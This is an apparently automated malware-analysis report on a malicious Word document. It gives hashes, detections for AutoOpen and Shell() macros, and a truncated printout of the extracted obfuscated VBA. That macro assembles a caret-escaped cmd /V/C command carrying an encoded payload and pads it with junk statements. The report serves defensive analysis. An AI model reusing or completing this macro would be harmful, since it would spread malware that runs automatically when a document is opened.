Office (OLE) malware analysis — malicious · c030aaacd17be36d

MALICIOUS

Office (OLE)

85.1 KB Created: 2018-08-29 21:47:00 Authoring application: Microsoft Office Word First seen: 2018-11-05

MD5: a3366249ceb9fce439948f22ae9435ce SHA-1: 79ac5acdb30e3835719ac6a3e7b83f100805cf51 SHA-256: c030aaacd17be36d96cf691364799cf02a047b17e8969daa4a46425d67fabdec

202 Risk Score

Heuristics 6

ClamAV: Doc.Malware.Generic-6668018-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6668018-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8286 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8286 bytes
SHA-256: `37535881971c429006013649d5f83f8c3df56f6b7f8a9af9993fd95b2c3646a6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "iSdjSRmNQOkTwv" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "TXzCzHDQcMfERI" Function ZuWSifwo() On _ Error _ Resume _ Next Hour 3535 / jABRD Hour ZfBVqm * BvSYX Hour wPSoj / WYdId skfUwOlpPH = "md /V/" + "C" + Chr(1 + 2 + 2 + 2 + 27) + "^s^e^" + "t N^Y" + "^GD" + "==A^" + "A^" + "I^AAC^A" + "^gA^A^" + "I^A^" Hour 59300 * lKwlI / wdOIY / KEtKsR MsolBSWtSFo = "AC^A" + "g^A" + "A^" + "IA^AC" + "^AgA" Hour IhwQj / EAwwTi Hour ZVvIjd * ZwIHKp / 23328 / OUSooT Hour 60580 / 75695 Hour 78812 * DUNZS * 38088 * XUYdb Hour 88956 / rKzpd * 14510 * KoKAs pkzJYPl = "AI^AAC" + "^A^" + "g^AAIAA" + "C^A" + "g" + "^" + "AAIA^A" + "C" + "^A^9BQ" + "f^A" Hour jYjjdF * 29626 Hour Gcujq / jGPNK * qDLpN / VOGnE nwcfC = "s" + "H^AoBwY" + "^A" + "^QH^A" + "^hBw^Y^" + "A^0^H^" + "A^" + "7^A" + "^w^a" Hour nztZBw * sfbDDB * RFpjLJ * 8107 Hour AwuUCs / YJEEU * hPNOC * 4204 Hour UUrQBt / TTYtL / QmLuK * pSuHk fVSnJDbJYs = "^A" + "EGA^lB" + "gcA^IG^" + "A" + "7^AQ^d" + "^" Hour 83302 * JOfRE Hour TskBa * NGYHFB Hour 88165 / viMlK * qJSYM / bZjqX nuwwERzibL = "AIH" + "^A^EB" + "^AJA" + "AC" + "^A" + "t^BQ^ZA" + "QHA" + "^" + "J^B^Q" Hour 51304 / CDicQq Hour ifioM / wvjwJL / ZHiIR / EwrDw Hour utQiwJ / frfSu Hour 67421 * dNVmh wEqqrHnwA = "^L" + "AUGAr" + "B^" + "w" + "^bAY^" + "HAu^B" + "^Q^" + "S^As^" + "D" + "^A" + "^p" + "^AQd^" Hour 87232 / lPWmA * 38548 / XCshLK Hour vHzjjw / WkRUsV Hour 26165 * XkSrb * 73469 / llwrz buhOr = "A" + "IH" + "^AEB^A" + "^JAAC^" + "As" + "^Aw^a^A" + "kG^A^" + "H^B" + "^A^J^" + "AgCAlB" Hour 50722 * fiQSc Hour 62409 * VHsFK / JJwLz / EBCrwi Hour 97818 / NAzNPw PzCdjzt = "^Ab" + "^A" + "kGA" + "^G^BAZ" + "AEG" + "AvB" + "^A^bA^4" + "^G^A3" + "Bw^b" + "^AQE^A" + "^uA^Q^a" + "^A^0" ZuWSifwo = skfUwOlpPH + MsolBSWtSFo + pkzJYPl + nwcfC + fVSnJDbJYs + nuwwERzibL + wEqqrHnwA + buhOr + PzCdjzt Hour 28888 / wNcEIc Hour 96030 * iUNXYh / 59113 / GusvU End Function Function NEJctbE() On _ Error _ Resume _ Next Hour sJdMTM * odfPr Hour 25991 / 99018 * ZSdOw * IXFlzE Hour QGmIJ * oUFFWf Hour 90886 * PUlYqq Hour 15626 * lRIsVZ RrunN = "GA^" + "GB^" + "AJAsH" + "^" + "A5^Bg" + "cA^Q^HA" + "^7B^QK" + "^A" Hour 22041 * GnYzOI / FnbcG / SmaUrj XQPkSqZS = "^sG^AW" + "^B^wSA" + "QC^A" + "^gAg" + "b^A" Hour 75316 * WjtEHa Hour IwJBYq * XjmFh Hour 1766 / 2702 Hour zPAFH / OODsUm Hour 17343 * zzRMXb GtNTiw = "^kG" + "^AgA^w" + "^aA^" + "kGAHBAJ" + "A^gCA^o" + "^BwY^" + "AE^G^" + "Al^BgcA" + "^8G" + "A^" + "m" + "^Bw^O^" + "AcCAl^B" Hour ohCzR * ZFVlO Hour rPqdm / 55455 Hour 98819 / 51132 / irfKo * MrVjB zpKuIs = "Ae" + "A" + "U^G^A" + "^uAw" + "JAsCA1" + "^Bw^" + "QAoH^" + "AkA^" + "wKAcCA" Hour 80543 / tNvZtp Hour wGKuz * 66681 MocpUVD = "cBw" + "J" + "A^" + "sC^" + "A^j^BQ" + "aA^w" + "^G^A" + "i" + "B^Qd^" + "A^AH^" Hour 3244 * 15000 Hour 96896 / JlVpfP Hour AzCwj / zkBOMG * 31057 * wvPlL mUJFVGbHEY = "A^6^Ag^" + "d^A" + "4^GAl^B" + "^AJ^" + "A0^" + "DA^1B" + "gcAQ" + "^" + "E^" + "AkA^" + "w" + "O" + "^AcCA" Hour 28874 / SdsdEz * iEwSSt / EOarc Hour 15307 * KlwoU Hour wwaUH / hPOip * aQVpjj / LALSN Hour 90849 / pOzXj fldhGUbZKz = "^2^" + "Ag^M^" + "AUD^A" + "nAAIA^" + "0^D^" + "Ag^" + "A^Qd^A^" Hour iRIzo * PqRcfS jRYrPk = "MEA6B^A" + "^JAsD^" + "ApA^wJ^" + "AA^E" + "AnA" + "^A^" + "KA^QHA" + "p^B^A" + "bA^AH^A" + "T" + "B^g^" + "L^A" + "cC^A" Hour jXiRqV / PwqXY Hour aLDdQ / qfwEQz * ZkZbH / DEsBV Hour 68973 / lUAkz Hour 48237 / 88099 * 21267 * jVnjM oqkpohlcD = "^0B" + "g^eAU^" + "FA^3" + "^B" + "wTA^" + "8CA" + "t^Bw^bA" + "MGA" + "^u^A" NEJctbE = RrunN + XQPkSqZS + GtNTiw + zpKuIs + MocpUVD + mUJFVGbHEY + fldhGUbZKz + jRYrPk + oqkpohlcD Hour OMFiY / rSHlf * AvZdll / iKhCw Hour ... (truncated)

SHA-256: 37535881971c429006013649d5f83f8c3df56f6b7f8a9af9993fd95b2c3646a6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "iSdjSRmNQOkTwv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TXzCzHDQcMfERI"
Function ZuWSifwo()

On _
Error _
Resume _
Next
Hour 3535 / jABRD
   Hour ZfBVqm * BvSYX
   Hour wPSoj / WYdId
skfUwOlpPH = "md /V/" + "C" + Chr(1 + 2 + 2 + 2 + 27) + "^s^e^" + "t N^Y" + "^GD" + "==A^" + "A^" + "I^AAC^A" + "^gA^A^" + "I^A^"
Hour 59300 * lKwlI / wdOIY / KEtKsR
MsolBSWtSFo = "AC^A" + "g^A" + "A^" + "IA^AC" + "^AgA"
Hour IhwQj / EAwwTi
   Hour ZVvIjd * ZwIHKp / 23328 / OUSooT
   Hour 60580 / 75695
   Hour 78812 * DUNZS * 38088 * XUYdb
   Hour 88956 / rKzpd * 14510 * KoKAs
pkzJYPl = "AI^AAC" + "^A^" + "g^AAIAA" + "C^A" + "g" + "^" + "AAIA^A" + "C" + "^A^9BQ" + "f^A"
Hour jYjjdF * 29626
   Hour Gcujq / jGPNK * qDLpN / VOGnE
nwcfC = "s" + "H^AoBwY" + "^A" + "^QH^A" + "^hBw^Y^" + "A^0^H^" + "A^" + "7^A" + "^w^a"
Hour nztZBw * sfbDDB * RFpjLJ * 8107
   Hour AwuUCs / YJEEU * hPNOC * 4204
   Hour UUrQBt / TTYtL / QmLuK * pSuHk
fVSnJDbJYs = "^A" + "EGA^lB" + "gcA^IG^" + "A" + "7^AQ^d" + "^"
Hour 83302 * JOfRE
   Hour TskBa * NGYHFB
   Hour 88165 / viMlK * qJSYM / bZjqX
nuwwERzibL = "AIH" + "^A^EB" + "^AJA" + "AC" + "^A" + "t^BQ^ZA" + "QHA" + "^" + "J^B^Q"
Hour 51304 / CDicQq
   Hour ifioM / wvjwJL / ZHiIR / EwrDw
   Hour utQiwJ / frfSu
   Hour 67421 * dNVmh
wEqqrHnwA = "^L" + "AUGAr" + "B^" + "w" + "^bAY^" + "HAu^B" + "^Q^" + "S^As^" + "D" + "^A" + "^p" + "^AQd^"
Hour 87232 / lPWmA * 38548 / XCshLK
   Hour vHzjjw / WkRUsV
   Hour 26165 * XkSrb * 73469 / llwrz
buhOr = "A" + "IH" + "^AEB^A" + "^JAAC^" + "As" + "^Aw^a^A" + "kG^A^" + "H^B" + "^A^J^" + "AgCAlB"
Hour 50722 * fiQSc
   Hour 62409 * VHsFK / JJwLz / EBCrwi
   Hour 97818 / NAzNPw
PzCdjzt = "^Ab" + "^A" + "kGA" + "^G^BAZ" + "AEG" + "AvB" + "^A^bA^4" + "^G^A3" + "Bw^b" + "^AQE^A" + "^uA^Q^a" + "^A^0"
ZuWSifwo = skfUwOlpPH + MsolBSWtSFo + pkzJYPl + nwcfC + fVSnJDbJYs + nuwwERzibL + wEqqrHnwA + buhOr + PzCdjzt
   Hour 28888 / wNcEIc
   Hour 96030 * iUNXYh / 59113 / GusvU
End Function
Function NEJctbE()

On _
Error _
Resume _
Next
Hour sJdMTM * odfPr
   Hour 25991 / 99018 * ZSdOw * IXFlzE
   Hour QGmIJ * oUFFWf
   Hour 90886 * PUlYqq
   Hour 15626 * lRIsVZ
RrunN = "GA^" + "GB^" + "AJAsH" + "^" + "A5^Bg" + "cA^Q^HA" + "^7B^QK" + "^A"
Hour 22041 * GnYzOI / FnbcG / SmaUrj
XQPkSqZS = "^sG^AW" + "^B^wSA" + "QC^A" + "^gAg" + "b^A"
Hour 75316 * WjtEHa
   Hour IwJBYq * XjmFh
   Hour 1766 / 2702
   Hour zPAFH / OODsUm
   Hour 17343 * zzRMXb
GtNTiw = "^kG" + "^AgA^w" + "^aA^" + "kGAHBAJ" + "A^gCA^o" + "^BwY^" + "AE^G^" + "Al^BgcA" + "^8G" + "A^" + "m" + "^Bw^O^" + "AcCAl^B"
Hour ohCzR * ZFVlO
   Hour rPqdm / 55455
   Hour 98819 / 51132 / irfKo * MrVjB
zpKuIs = "Ae" + "A" + "U^G^A" + "^uAw" + "JAsCA1" + "^Bw^" + "QAoH^" + "AkA^" + "wKAcCA"
Hour 80543 / tNvZtp
   Hour wGKuz * 66681
MocpUVD = "cBw" + "J" + "A^" + "sC^" + "A^j^BQ" + "aA^w" + "^G^A" + "i" + "B^Qd^" + "A^AH^"
Hour 3244 * 15000
   Hour 96896 / JlVpfP
   Hour AzCwj / zkBOMG * 31057 * wvPlL
mUJFVGbHEY = "A^6^Ag^" + "d^A" + "4^GAl^B" + "^AJ^" + "A0^" + "DA^1B" + "gcAQ" + "^" + "E^" + "AkA^" + "w" + "O" + "^AcCA"
Hour 28874 / SdsdEz * iEwSSt / EOarc
   Hour 15307 * KlwoU
   Hour wwaUH / hPOip * aQVpjj / LALSN
   Hour 90849 / pOzXj
fldhGUbZKz = "^2^" + "Ag^M^" + "AUD^A" + "nAAIA^" + "0^D^" + "Ag^" + "A^Qd^A^"
Hour iRIzo * PqRcfS
jRYrPk = "MEA6B^A" + "^JAsD^" + "ApA^wJ^" + "AA^E" + "AnA" + "^A^" + "KA^QHA" + "p^B^A" + "bA^AH^A" + "T" + "B^g^" + "L^A" + "cC^A"
Hour jXiRqV / PwqXY
   Hour aLDdQ / qfwEQz * ZkZbH / DEsBV
   Hour 68973 / lUAkz
   Hour 48237 / 88099 * 21267 * jVnjM
oqkpohlcD = "^0B" + "g^eAU^" + "FA^3" + "^B" + "wTA^" + "8CA" + "t^Bw^bA" + "MGA" + "^u^A"
NEJctbE = RrunN + XQPkSqZS + GtNTiw + zpKuIs + MocpUVD + mUJFVGbHEY + fldhGUbZKz + jRYrPk + oqkpohlcD
   Hour OMFiY / rSHlf * AvZdll / iKhCw
   Hour
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.